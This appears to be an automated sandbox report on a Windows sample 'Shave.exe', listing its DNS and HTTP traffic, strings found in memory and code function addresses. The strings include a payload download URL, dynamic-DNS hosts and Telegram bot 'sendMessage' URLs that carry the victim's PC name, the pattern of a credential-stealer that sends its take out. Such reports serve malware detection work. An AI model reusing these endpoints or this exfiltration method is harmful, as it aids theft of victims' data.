            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: mertvinc.com.tr
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.cipmach.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 06:09:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Shave.exe, 00000003.00000002.3299164468.00000000352A4000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035283000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003529A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cipmach.com
            Source: Shave.exe, 00000003.00000002.3280053840.00000000066D0000.00000004.00001000.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin
            Source: Shave.exe, 00000003.00000002.3279604982.0000000004BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin6
            Source: Shave.exe, 00000003.00000002.3279604982.0000000004B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.binQ
            Source: Shave.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Shave.exe, 00000003.00000002.3299164468.00000000352F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Shave.exe, 00000003.00000002.3299164468.00000000352EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Shave.exe, 00000003.00000002.3299164468.000000003517D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
            Source: Shave.exe, 00000003.00000002.3299164468.00000000351A8000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035215000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.00000000351ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Shave.exe, 00000003.00000002.3300398424.0000000036151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Shave.exe, 00000003.00000002.3299164468.0000000035322000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, Shave.exe, 00000003.00000002.3299164468.0000000035313000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Shave.exe, 00000003.00000002.3299164468.000000003531D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
            Source: C:\Users\user\Desktop\Shave.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_00404C7B0_2_00404C7B
            Source: C:\Users\user\Desktop\Shave.exeCode function: 0_2_6F971B630_2_6F971B63
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00404C7B3_2_00404C7B
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015C19B3_2_0015C19B
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015D2783_2_0015D278
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_001553623_2_00155362
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015C4683_2_0015C468
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015C7383_2_0015C738
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015E9883_2_0015E988
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_001569A03_2_001569A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_001529E03_2_001529E0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015CA083_2_0015CA08
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015CCD83_2_0015CCD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00159DE03_2_00159DE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015CFAC3_2_0015CFAC
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00156FC83_2_00156FC8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015F9743_2_0015F974
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_0015E97C3_2_0015E97C
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_00153E093_2_00153E09
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B081D03_2_04B081D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0E9D83_2_04B0E9D8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B08FB03_2_04B08FB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B07B783_2_04B07B78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0C0B73_2_04B0C0B7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B038B83_2_04B038B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0E0B83_2_04B0E0B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0E0A73_2_04B0E0A7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B004983_2_04B00498
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B064883_2_04B06488
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B008F03_2_04B008F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0C0C83_2_04B0C0C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B060303_2_04B06030
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0BC383_2_04B0BC38
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0DC283_2_04B0DC28
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0BC2A3_2_04B0BC2A
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0FC183_2_04B0FC18
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0DC193_2_04B0DC19
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B030073_2_04B03007
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B030083_2_04B03008
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B064783_2_04B06478
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B034603_2_04B03460
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B034503_2_04B03450
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0345F3_2_04B0345F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B000403_2_04B00040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B011A03_2_04B011A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B011903_2_04B01190
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0119F3_2_04B0119F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B015F73_2_04B015F7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B015F83_2_04B015F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0C9E83_2_04B0C9E8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B015E83_2_04B015E8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0C9D83_2_04B0C9D8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B081C03_2_04B081C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0E9C83_2_04B0E9C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0A9383_2_04B0A938
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0E5383_2_04B0E538
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0A9283_2_04B0A928
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0C5583_2_04B0C558
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B00D483_2_04B00D48
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0E5483_2_04B0E548
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0C5483_2_04B0C548
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B01EA73_2_04B01EA7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B01EA83_2_04B01EA8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B01E983_2_04B01E98
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B022F03_2_04B022F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0D2F73_2_04B0D2F7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0F2F83_2_04B0F2F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B022FF3_2_04B022FF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0F2E73_2_04B0F2E7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B04ED03_2_04B04ED0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B072C83_2_04B072C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B072CA3_2_04B072CA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B046203_2_04B04620
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B046223_2_04B04622
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B06A183_2_04B06A18
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B06A073_2_04B06A07
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B06E703_2_04B06E70
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B06E723_2_04B06E72
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B04A783_2_04B04A78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0CE783_2_04B0CE78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0CE673_2_04B0CE67
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0EE683_2_04B0EE68
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B01A503_2_04B01A50
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0EE573_2_04B0EE57
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B01A413_2_04B01A41
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B01A4F3_2_04B01A4F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B02BB03_2_04B02BB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B02BA03_2_04B02BA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B08FA13_2_04B08FA1
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0B7A83_2_04B0B7A8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B02BAF3_2_04B02BAF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0D7983_2_04B0D798
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0B7983_2_04B0B798
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B057803_2_04B05780
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0D7873_2_04B0D787
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0F7883_2_04B0F788
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B02FF93_2_04B02FF9
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B05BD83_2_04B05BD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B05BCA3_2_04B05BCA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B077203_2_04B07720
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B077223_2_04B07722
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B053283_2_04B05328
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0B3183_2_04B0B318
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B023003_2_04B02300
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0B3073_2_04B0B307
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0D3083_2_04B0D308
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B07B773_2_04B07B77
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B0F7783_2_04B0F778
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B07B693_2_04B07B69
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B027573_2_04B02757
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B027583_2_04B02758
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B027493_2_04B02749
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B366783_2_04B36678
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B35FD83_2_04B35FD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3FAB03_2_04B3FAB0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B356B83_2_04B356B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B38CB83_2_04B38CB8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B336B83_2_04B336B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3E2B83_2_04B3E2B8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B374BF3_2_04B374BF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3A4A03_2_04B3A4A0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3FAA03_2_04B3FAA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B38CA93_2_04B38CA9
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B356A83_2_04B356A8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3A4983_2_04B3A498
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B312803_2_04B31280
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B324883_2_04B32488
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3BC883_2_04B3BC88
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B348F73_2_04B348F7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3B2F83_2_04B3B2F8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B316FF3_2_04B316FF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3CAE03_2_04B3CAE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3B2E83_2_04B3B2E8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3CAD13_2_04B3CAD1
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B304D03_2_04B304D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B374D03_2_04B374D0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B304C03_2_04B304C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B336C83_2_04B336C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3E2C83_2_04B3E2C8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3AE303_2_04B3AE30
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B396373_2_04B39637
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B332383_2_04B33238
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B352283_2_04B35228
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3322E3_2_04B3322E
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3C6123_2_04B3C612
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3C6183_2_04B3C618
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3AE1F3_2_04B3AE1F
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3521C3_2_04B3521C
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3DE003_2_04B3DE00
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B300063_2_04B30006
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B366093_2_04B36609
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B370083_2_04B37008
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3D4703_2_04B3D470
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B312703_2_04B31270
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B344783_2_04B34478
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B324783_2_04B32478
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3BC783_2_04B3BC78
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B37E603_2_04B37E60
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3D4603_2_04B3D460
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B344683_2_04B34468
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B366683_2_04B36668
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B37E503_2_04B37E50
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3EC583_2_04B3EC58
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B300403_2_04B30040
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3EC4A3_2_04B3EC4A
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B396483_2_04B39648
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B31BA03_2_04B31BA0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3CFA63_2_04B3CFA6
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B32DA83_2_04B32DA8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3CFA83_2_04B3CFA8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3B7AF3_2_04B3B7AF
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B31B913_2_04B31B91
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3E7903_2_04B3E790
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B34D983_2_04B34D98
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B379983_2_04B37998
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B32D9C3_2_04B32D9C
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B391803_2_04B39180
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B34D893_2_04B34D89
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B379883_2_04B37988
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B30DF03_2_04B30DF0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B387F03_2_04B387F0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3DDF03_2_04B3DDF0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B36FFA3_2_04B36FFA
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B31FF83_2_04B31FF8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B30DE03_2_04B30DE0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B387E03_2_04B387E0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B33FE83_2_04B33FE8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3F5E83_2_04B3F5E8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B31FE83_2_04B31FE8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B39FD03_2_04B39FD0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3F5D73_2_04B3F5D7
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B39FD83_2_04B39FD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B33FD83_2_04B33FD8
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B3B7C03_2_04B3B7C0
            Source: C:\Users\user\Desktop\Shave.exeCode function: 3_2_04B35FC73_2_04B35FC7
